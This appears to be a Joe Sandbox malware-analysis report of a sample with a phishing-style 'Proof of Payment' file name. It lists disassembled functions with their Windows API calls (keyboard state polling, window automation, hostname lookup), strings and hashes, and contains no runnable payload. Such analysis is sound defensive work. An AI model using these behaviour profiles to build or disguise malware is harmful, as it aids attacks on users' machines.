Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: abcee0f9d3b9afb1d3d1deb5f3e82c02e4bc97836283a5ef344a28d796f28913
Instruction ID: ab0792c11782376f728ae928a8dedc22992e69600268c4b17d5479c2e2b614c7
Opcode Fuzzy Hash: abcee0f9d3b9afb1d3d1deb5f3e82c02e4bc97836283a5ef344a28d796f28913
Instruction Fuzzy Hash: D811B2A1A4025979D730B767CC4ADFFBA7CFFD2B10F000419B555AA0D5EEA80945DAE0

Function 00FF778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00FF7794

Part of subcall function 00FCDC38: timeGetTime.WINMM(?,75A4B400,010258AB), ref: 00FCDC3C

Sleep.KERNEL32(0000000A), ref: 00FF77C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00FF77E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00FF7806
SetActiveWindow.USER32 ref: 00FF7825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FF7833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00FF7852
Sleep.KERNEL32(000000FA), ref: 00FF785D
IsWindow.USER32 ref: 00FF7869
EndDialog.USER32(00000000), ref: 00FF787A

Strings

BUTTON, xrefs: 00FF77F8

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: cb8bed579fadcbd1644d099a3c1443f989a3ccae9a688717c56f88c8f8c2081b
Instruction ID: 89ab934f5fd528a7accdccb08e245f039b229b77ec079e23667d273a8477920c
Opcode Fuzzy Hash: cb8bed579fadcbd1644d099a3c1443f989a3ccae9a688717c56f88c8f8c2081b
Instruction Fuzzy Hash: 04217171A04309AFE3346B60EC89B357B2EFB04758F504014F685992A9DB6B8C10F715

Function 010002EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB936C: __swprintf.LIBCMT ref: 00FB93AB
Part of subcall function 00FB936C: __itow.LIBCMT ref: 00FB93DF

CoInitialize.OLE32(00000000), ref: 0100034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 010003DE
SHGetDesktopFolder.SHELL32(?), ref: 010003F2
CoCreateInstance.OLE32(0103DA8C,00000000,00000001,01063CF8,?), ref: 0100043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 010004AD
CoTaskMemFree.OLE32(?,?), ref: 01000505
_memset.LIBCMT ref: 01000542
SHBrowseForFolderW.SHELL32(?), ref: 0100057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 010005A1
CoTaskMemFree.OLE32(00000000), ref: 010005A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 010005DF
CoUninitialize.OLE32(00000001,00000000), ref: 010005E1

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: b693ad924b340ecf9f033f83f350e8b3951bf549fe5af00c90bc663ea730db4a
Instruction ID: 4e75421856e5eb7c3fc67a099d780a3c0646e1636ed8bb7c1494214c9bc75b5b
Opcode Fuzzy Hash: b693ad924b340ecf9f033f83f350e8b3951bf549fe5af00c90bc663ea730db4a
Instruction Fuzzy Hash: D9B1F874A00209AFDB15DFA5C888EAEBBB9FF48304F048499F949EB255DB35E941CF50

Function 00FF2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00FF2ED6
SetKeyboardState.USER32(?), ref: 00FF2F41
GetAsyncKeyState.USER32(000000A0), ref: 00FF2F61
GetKeyState.USER32(000000A0), ref: 00FF2F78
GetAsyncKeyState.USER32(000000A1), ref: 00FF2FA7
GetKeyState.USER32(000000A1), ref: 00FF2FB8
GetAsyncKeyState.USER32(00000011), ref: 00FF2FE4
GetKeyState.USER32(00000011), ref: 00FF2FF2
GetAsyncKeyState.USER32(00000012), ref: 00FF301B
GetKeyState.USER32(00000012), ref: 00FF3029
GetAsyncKeyState.USER32(0000005B), ref: 00FF3052
GetKeyState.USER32(0000005B), ref: 00FF3060

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 798a2ad22335e7c42cab5dca07983dfaaa527172dc1b6ed364aaaaaddbee7d28
Instruction ID: 2b931cbef070478a0aeffc54a9821c1dd491b6f42ed82969c78e1ef5cec813b9
Opcode Fuzzy Hash: 798a2ad22335e7c42cab5dca07983dfaaa527172dc1b6ed364aaaaaddbee7d28
Instruction Fuzzy Hash: 3C51E720E0479C29FB75DBA488107FABBB45F11354F08458EC7C2561E2DA589B8CD762

Function 00FEED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00FEED1E
GetWindowRect.USER32(00000000,?), ref: 00FEED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FEED8E
GetDlgItem.USER32(?,00000002), ref: 00FEED99
GetWindowRect.USER32(00000000,?), ref: 00FEEDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FEEE01
GetDlgItem.USER32(?,000003E9), ref: 00FEEE0F
GetWindowRect.USER32(00000000,?), ref: 00FEEE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FEEE63
GetDlgItem.USER32(?,000003EA), ref: 00FEEE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FEEE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 00FEEE9B

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ab82844dea9d8fb855ac0206541f1300948527b8bb77fb58ec80670790c712e5
Instruction ID: 1e2285492039394e971b5f6780c76f2bb2eddaf59236324b16be9524d82cbfa5
Opcode Fuzzy Hash: ab82844dea9d8fb855ac0206541f1300948527b8bb77fb58ec80670790c712e5
Instruction Fuzzy Hash: 6C5140B1B00205AFDF18CFA9DD89AAEBBBAFB88310F54812DF519D7294D7759D009B10

Function 00FCB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00FCB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FCB759,?,00000000,?,?,?,?,00FCB72B,00000000,?), ref: 00FCBA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00FCB72B), ref: 00FCB7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,00FCB72B,00000000,?,?,00FCB2EF,?,?), ref: 00FCB88D
DestroyAcceleratorTable.USER32(00000000), ref: 0102D8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FCB72B,00000000,?,?,00FCB2EF,?,?), ref: 0102D8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FCB72B,00000000,?,?,00FCB2EF,?,?), ref: 0102D8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FCB72B,00000000,?,?,00FCB2EF,?,?), ref: 0102D90A
DeleteObject.GDI32(00000000), ref: 0102D91C

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: e8dbde19866ae28293dcf2beae822c07cd43084f7b84b3cd592a15fe7a30539a
Instruction ID: 543d1768a9407afcd8b3eccd527237bc22f5a26f7684232b98e7919fd116e4f4
Opcode Fuzzy Hash: e8dbde19866ae28293dcf2beae822c07cd43084f7b84b3cd592a15fe7a30539a
Instruction Fuzzy Hash: 7561B035900612CFDB369F58DA8AB25B7F9FF88711F14051DE4C696AA4C77AA880EF40

Function 00FCB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 00FCB526: GetWindowLongW.USER32(?,000000EB), ref: 00FCB537

GetSysColor.USER32(0000000F), ref: 00FCB438

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: bf5a08c1932eb94dc564361ed01f9bb691817e12aa26d44821c5763e8000699f
Instruction ID: 62cdae058eec8729dfd746cf08345d0c88a1c4fdfb31998b61f6d1e37b234caa
Opcode Fuzzy Hash: bf5a08c1932eb94dc564361ed01f9bb691817e12aa26d44821c5763e8000699f
Instruction Fuzzy Hash: B3410534404110AFDF24AF68D98BFB93B65AB05730F584259FEA58E1DAC7368C41E721

Function 00FF690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00FF6923
_wcscpy.LIBCMT ref: 00FF6934
__wsplitpath.LIBCMT ref: 00FF6958
__wsplitpath.LIBCMT ref: 00FF6979
_wcscpy.LIBCMT ref: 00FF699B
_wcscpy.LIBCMT ref: 00FF69B9
_wcscpy.LIBCMT ref: 00FF69C7
_wcscat.LIBCMT ref: 00FF69D6
_wcscat.LIBCMT ref: 00FF6A2B
_wcscat.LIBCMT ref: 00FF6A61
_wcscat.LIBCMT ref: 00FF6A73

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 86bc053563ef2d44c502d420296fd2510e4e7cbf383205b0d65c120f9c848f0e
Instruction ID: 38e3fd625e719b0601867bb6c40cdec9d37d7f6b45ab1c54ddf663f35f7d2f04
Opcode Fuzzy Hash: 86bc053563ef2d44c502d420296fd2510e4e7cbf383205b0d65c120f9c848f0e
Instruction Fuzzy Hash: 02412A7684511CAECB61EB90CC82DDA73BDEF44310F0441A7B649E2151EE74ABE89B50

Function 00FFD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0104DC00,0104DC00,0104DC00), ref: 00FFD7CE
GetDriveTypeW.KERNEL32(?,01063A70,00000061), ref: 00FFD898
_wcscpy.LIBCMT ref: 00FFD8C2

Strings

network, xrefs: 00FFD82C
ramdisk, xrefs: 00FFD842
removable, xrefs: 00FFD800
unknown, xrefs: 00FFD859
all, xrefs: 00FFD7D4
fixed, xrefs: 00FFD816
cdrom, xrefs: 00FFD7EA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: fda3af36b49bd197b2c07f96f978213186cac05b24a243f1b5ebe9407c0e726a
Instruction ID: 78f0f3d745feb5693e42f237c8674ec6ab9a88b26c20f941db927f53258934a6
Opcode Fuzzy Hash: fda3af36b49bd197b2c07f96f978213186cac05b24a243f1b5ebe9407c0e726a
Instruction Fuzzy Hash: AB51A131504209AFC710EF14CD82BBEB7A6FF84764F10881DF6995B2A2DB75D905EB82

Function 00FB936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00FB93AB
__itow.LIBCMT ref: 00FB93DF

Part of subcall function 00FD1557: _xtow@16.LIBCMT ref: 00FD1578

Strings

0x%p, xrefs: 01024CAD
%.15g, xrefs: 00FB93A5
False, xrefs: 01024C93
True, xrefs: 01024C8C

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 513a58930104d722f84b05c005d2d79a44485b36de7728e656b3f7264f4571ef
Instruction ID: a7f135daa7d811f4519c2fd8d906040b6c0518ed77b4a9d5d6b9c3ee606aead0
Opcode Fuzzy Hash: 513a58930104d722f84b05c005d2d79a44485b36de7728e656b3f7264f4571ef
Instruction Fuzzy Hash: 4A412B32504215EFEB54DF39DD42FAAB7E9EF44300F2444AEE28AC7181EA759501EB50

Function 0101A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0101A259
CreateCompatibleDC.GDI32(00000000), ref: 0101A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0101A273
SelectObject.GDI32(00000000,00000000), ref: 0101A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0101A286
DeleteDC.GDI32(00000000), ref: 0101A28F
GetWindowLongW.USER32(?,000000EC), ref: 0101A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0101A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0101A2B9

Strings

static, xrefs: 0101A1F1

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: e3e4317f61bef81131a37d123d18251747d47fd63524efbdeb2fe43c33fa2103
Instruction ID: 9921a2731ed463c91bb4e0f58b2eb7de8c0ce481dbeff029cdfb980576d0bd99
Opcode Fuzzy Hash: e3e4317f61bef81131a37d123d18251747d47fd63524efbdeb2fe43c33fa2103
Instruction Fuzzy Hash: 77314E31201215BBDF225FA8DC49FDA3BADFF0D760F110215FA99A6194C73AD811DBA4

Function 00FF6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00FF6F1D
gethostname.WSOCK32(?,00000100), ref: 00FF6F37
gethostbyname.WSOCK32(?), ref: 00FF6F44
_wcscpy.LIBCMT ref: 00FF6F6C
inet_ntoa.WSOCK32(?), ref: 00FF6F8A
_strcat.LIBCMT ref: 00FF6F98
_wcscpy.LIBCMT ref: 00FF6FAF
WSACleanup.WSOCK32 ref: 00FF6FBD
_wcscpy.LIBCMT ref: 00FF6FCB

Strings

0.0.0.0, xrefs: 00FF6F66

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: d7deb24b6994f0d1a6994f060eba1f1441f24eadaa47bf8491fa4421cf1178d0
Instruction ID: df2776f1f32498bed9bf76888c62d988e4ab762a112fd33f61c9a25da84dc108
Opcode Fuzzy Hash: d7deb24b6994f0d1a6994f060eba1f1441f24eadaa47bf8491fa4421cf1178d0
Instruction Fuzzy Hash: 75110D71904119ABCB25A7B0AC4AFE9776DEF40720F040166F145D6091FF79DE85A750

Function 00FD500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FD5047

Part of subcall function 00FD7C0E: __getptd_noexit.LIBCMT ref: 00FD7C0E

__gmtime64_s.LIBCMT ref: 00FD50E0
__gmtime64_s.LIBCMT ref: 00FD5116
__gmtime64_s.LIBCMT ref: 00FD5133
__allrem.LIBCMT ref: 00FD5189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD51A5
__allrem.LIBCMT ref: 00FD51BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD51DA
__allrem.LIBCMT ref: 00FD51F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD520F
__invoke_watson.LIBCMT ref: 00FD5280

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 89af4b8696f756ebc5f60bdc804f562a3382c62b8cccf03fd2de424b5e965c79
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: F071D672E00B17ABE714AE69CC41B6A73AABF14B64F18422BF410D6381E774DD44ABD0

Function 00FF4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF4DF8
GetMenuItemInfoW.USER32(01071708,000000FF,00000000,00000030), ref: 00FF4E59
SetMenuItemInfoW.USER32(01071708,00000004,00000000,00000030), ref: 00FF4E8F
Sleep.KERNEL32(000001F4), ref: 00FF4EA1
GetMenuItemCount.USER32(?), ref: 00FF4EE5
GetMenuItemID.USER32(?,00000000), ref: 00FF4F01
GetMenuItemID.USER32(?,-00000001), ref: 00FF4F2B
GetMenuItemID.USER32(?,?), ref: 00FF4F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FF4FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF4FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF4FEB

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: d49e13634b6830430353d0733d745aee9c5cf35caeab312999c9df760dcee155
Instruction ID: d2bfe56bbd9d81537aa3e78b24656942621f7b078f7bfd15826eeafdd35ad9dc
Opcode Fuzzy Hash: d49e13634b6830430353d0733d745aee9c5cf35caeab312999c9df760dcee155
Instruction Fuzzy Hash: B0619D71A0024DAFDB21CFA4C884ABF7BB8EF41318F140159F656A32E4D775AD04EB60

Function 01019C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01019C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01019C9B
GetWindowLongW.USER32(?,000000F0), ref: 01019CBF
_memset.LIBCMT ref: 01019CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01019CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01019D5A

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 7d625829bd6361d50913bd578feffc27f9992d5c2a2e202426d16a0344b6abf2
Instruction ID: 23cb27b64b929ae54c078be3378e825d4bd5453bfd21512030776e9a753937f5
Opcode Fuzzy Hash: 7d625829bd6361d50913bd578feffc27f9992d5c2a2e202426d16a0344b6abf2
Instruction Fuzzy Hash: EA61AF75900208AFDB21DFA8CC81EEE77F8EF09704F14419AFA95E7291D778A941DB50

Function 00FE94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00FE94FE
